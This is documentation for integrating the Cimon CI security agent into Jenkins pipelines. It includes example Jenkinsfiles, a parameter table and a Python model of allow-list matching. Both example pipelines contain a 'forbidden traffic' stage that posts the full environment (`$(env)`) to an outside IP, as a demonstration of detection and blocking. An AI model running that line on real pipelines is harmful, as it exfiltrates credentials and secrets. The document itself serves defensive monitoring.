Jenkins (Beta)
Jenkins does not offer out-of-the-box hosted runners the way GitHub Actions and Azure Pipelines do, but it provides great flexibility in using self-hosted runners of varying execution types.
Jenkins Self-Hosted Runners Support
In Jenkins, there are two types of execution: creating virtual or physical nodes that execute jobs, or setting up a cloud (e.g., Docker-based or Kubernetes-based) that provisions the job on demand.
In both cases the underlying operating system must meet the minimal requirements for loading and running eBPF code. You can find more information in the self-hosted support and troubleshooting section.
Cimon Jenkins Pipeline
Jenkins supports running Cimon on all major pipeline types: "Freestyle project", "Pipeline", and "Multibranch Pipeline". As an example, here are two Jenkinsfiles that create a build and run Cimon, one in detect mode and one in prevent mode.
Detect Mode:
```groovy
pipeline {
    agent any
    environment {
        CIMON_CLIENT_ID = credentials("cimon-client-id")
        CIMON_SECRET = credentials("cimon-secret")
    }
    options {
        disableConcurrentBuilds()
    }
    stages {
        stage('Run Cimon') {
            steps {
                sh 'curl -sSfL https://cimon-releases.s3.amazonaws.com/run_cimon.sh | sudo -E sh -s -- agent'
            }
        }
        stage('Test') {
            steps {
                sh 'git clone https://github.com/octocat/Hello-World Hello-World'
            }
        }
        stage('Allowed network traffic') {
            steps {
                sh 'curl -sm 1 https://34.121.34.97 || true'
            }
        }
        stage('Allowed network traffic (hostname)') {
            steps {
                sh 'wget --quiet --timeout 1 https://cycode.com || true'
                sh 'wget --quiet --timeout 1 https://registry.npmjs.org || true'
            }
        }
        stage('Forbidden network traffic (IP)') {
            steps {
                sh 'curl -sm 1 -d "$(env)" https://34.121.34.100/upload/v2 || true'
            }
        }
        stage('Forbidden network traffic (hostname)') {
            steps {
                sh 'wget --quiet --timeout 1 https://yahoo.com || true'
            }
        }
    }
    post {
        always {
            cleanWs()
            sh """
                curl -sSfL https://cimon-releases.s3.amazonaws.com/stop_cimon.sh | sudo -E sh
            """
        }
    }
}
```
Explanation:
```groovy
environment {
    CIMON_CLIENT_ID = credentials("cimon-client-id")
    CIMON_SECRET = credentials("cimon-secret")
}
```
Cimon receives its input parameters through environment variables; the security policies are configured by these variables.
```groovy
options {
    disableConcurrentBuilds()
}
```
This option must be enabled so that builds of this job do not run concurrently on the same runner; the Cimon installation stage must always be the first to run.
```groovy
stage('Run Cimon') {
    steps {
        sh 'curl -sSfL https://cimon-releases.s3.amazonaws.com/run_cimon.sh | sudo -E sh -s -- agent'
    }
}
```
Installs the Cimon agent on the runner.
```groovy
post {
    always {
        cleanWs()
        sh """
            curl -sSfL https://cimon-releases.s3.amazonaws.com/stop_cimon.sh | sudo -E sh
        """
    }
}
```
The Cimon agent is stopped, and the report is printed to the build log.
Prevent Mode:
```groovy
pipeline {
    agent any
    environment {
        CIMON_PREVENT = "1"
        CIMON_ALLOWED_HOSTS = """
            github.com
            registry.npmjs.org
            cycode.com
        """
        CIMON_ALLOWED_IPS = """
            34.121.34.97
        """
    }
    options {
        disableConcurrentBuilds()
    }
    stages {
        stage('Run Cimon') {
            steps {
                sh 'curl -sSfL https://cimon-releases.s3.amazonaws.com/run_cimon.sh | sudo -E sh -s -- agent'
            }
        }
        stage('Test') {
            steps {
                sh 'git clone https://github.com/octocat/Hello-World Hello-World'
            }
        }
        stage('Allowed network traffic') {
            steps {
                sh 'curl -sm 1 https://34.121.34.97 || true'
            }
        }
        stage('Allowed network traffic (hostname)') {
            steps {
                sh 'wget --quiet --timeout 1 https://cycode.com || true'
                sh 'wget --quiet --timeout 1 https://registry.npmjs.org || true'
            }
        }
        stage('Forbidden network traffic (IP)') {
            steps {
                sh 'curl -sm 1 -d "$(env)" https://34.121.34.100/upload/v2 || true'
            }
        }
        stage('Forbidden network traffic (hostname)') {
            steps {
                sh 'wget --quiet --timeout 1 https://yahoo.com || true'
            }
        }
    }
    post {
        always {
            cleanWs()
            sh """
                curl -sSfL https://cimon-releases.s3.amazonaws.com/stop_cimon.sh | sudo -E sh
            """
        }
    }
}
```
Explanation:
```groovy
environment {
    CIMON_PREVENT = "1"
    CIMON_ALLOWED_HOSTS = """
        github.com
        registry.npmjs.org
        cycode.com
    """
    CIMON_ALLOWED_IPS = """
        34.121.34.97
    """
}
```
Cimon receives its input parameters through environment variables; the security policies are configured by these variables. Here prevention mode is enabled and only the listed hosts and IP address are allowed, so the "Forbidden network traffic" stages are blocked.
```groovy
options {
    disableConcurrentBuilds()
}
```
This option must be enabled so that builds of this job do not run concurrently on the same runner; the Cimon installation stage must always be the first to run.
```groovy
stage('Run Cimon') {
    steps {
        sh 'curl -sSfL https://cimon-releases.s3.amazonaws.com/run_cimon.sh | sudo -E sh -s -- agent'
    }
}
```
Installs the Cimon agent on the runner.
```groovy
post {
    always {
        cleanWs()
        sh """
            curl -sSfL https://cimon-releases.s3.amazonaws.com/stop_cimon.sh | sudo -E sh
        """
    }
}
```
The Cimon agent is stopped, and the report is printed to the build log.
Usage
Here are the parameters that are supported:

Environment Variable | Default | Description
---|---|---
CIMON_CLIENT_ID | | Cimon client ID for authentication
CIMON_SECRET | | Cimon secret for authentication
CIMON_URL | | Cimon endpoint for authentication
CIMON_PREVENT | false | Enable prevention mode
CIMON_ALLOWED_IPS | | A comma- or whitespace-separated list of allowed IP addresses
CIMON_ALLOWED_HOSTS | | A comma- or whitespace-separated list of allowed domain names. The left-most label can be the wildcard character (`*`) to match multiple subdomains (e.g. `*.example.com`).
CIMON_IGNORED_IP_NETS | | A comma- or whitespace-separated list of ignored IP networks in CIDR notation, e.g. `10.0.0.0/8, 172.16.0.0/12`. This setting is mandatory if your workflow runs containers attached to a custom network with a configured sub-range; inter-container networking is usually ignored by Cimon. Cimon implicitly ignores the 10.0.0.0/8 and 172.16.0.0/12 networks.
CIMON_REPORT_PROCESS_TREE | false | Enable to report the process tree
CIMON_SLACK_WEBHOOK_ENDPOINT | | Slack webhook endpoint to report security events
CIMON_LOG_LEVEL | info | Log level (used for debugging)
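To make the list formats and matching rules in the table concrete, here is an added Python model (not Cimon's own code) of how the prevent-mode environment block above classifies each destination the pipeline stages contact. It assumes that a `*.` wildcard matches subdomains but not the apex name itself, and that CIMON_PREVENT accepts `1` or `true`.

```python
import ipaddress
import re

IMPLICIT_IGNORED_NETS = ("10.0.0.0/8", "172.16.0.0/12")  # ignored by Cimon implicitly (per the table)

def split_list(value: str) -> list[str]:
    """Split a CIMON_* list value on commas and/or whitespace, the documented format."""
    return [item for item in re.split(r"[,\s]+", value.strip()) if item]

def host_matches(pattern: str, host: str) -> bool:
    """Exact match, or a left-most '*' label matching subdomains (assumed: not the apex itself)."""
    pattern, host = pattern.lower().rstrip("."), host.lower().rstrip(".")
    if not pattern.startswith("*."):
        return pattern == host
    suffix = pattern[1:]  # ".example.com"
    return host.endswith(suffix) and len(host) > len(suffix)

class Policy:
    """Model of the allow-list semantics from the parameter table (not Cimon's own code)."""

    def __init__(self, env: dict[str, str]):
        self.prevent = env.get("CIMON_PREVENT", "false").strip().lower() in ("1", "true")
        self.allowed_hosts = split_list(env.get("CIMON_ALLOWED_HOSTS", ""))
        self.allowed_ips = {ipaddress.ip_address(a) for a in split_list(env.get("CIMON_ALLOWED_IPS", ""))}
        nets = (*IMPLICIT_IGNORED_NETS, *split_list(env.get("CIMON_IGNORED_IP_NETS", "")))
        self.ignored_nets = [ipaddress.ip_network(n, strict=False) for n in nets]

    def evaluate(self, dest: str) -> str:
        """Return 'ignored', 'allowed', 'blocked' (prevent mode) or 'detected' (detect mode)."""
        try:
            ip = ipaddress.ip_address(dest)
        except ValueError:
            ip = None  # dest is a hostname, matched against CIMON_ALLOWED_HOSTS
        if ip is not None:
            if any(ip in net for net in self.ignored_nets):
                return "ignored"
            allowed = ip in self.allowed_ips
        else:
            allowed = any(host_matches(p, dest) for p in self.allowed_hosts)
        if allowed:
            return "allowed"
        return "blocked" if self.prevent else "detected"

PREVENT_ENV = {"CIMON_PREVENT": "1", "CIMON_ALLOWED_IPS": "\n34.121.34.97\n",  # prevent-mode Jenkinsfile env
               "CIMON_ALLOWED_HOSTS": "\ngithub.com\nregistry.npmjs.org\ncycode.com\n"}

def example_results(env: dict[str, str] = PREVENT_ENV) -> dict[str, str]:
    """Verdicts for the destinations the pipeline stages contact."""
    policy = Policy(env)
    return {d: policy.evaluate(d) for d in ("34.121.34.97", "34.121.34.100", "cycode.com", "yahoo.com")}
```

With an empty environment (detect mode) the same destinations are reported as "detected" rather than "blocked", and anything inside the implicitly ignored networks is skipped entirely.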
Report
Cimon prints the final report in the build log of each job.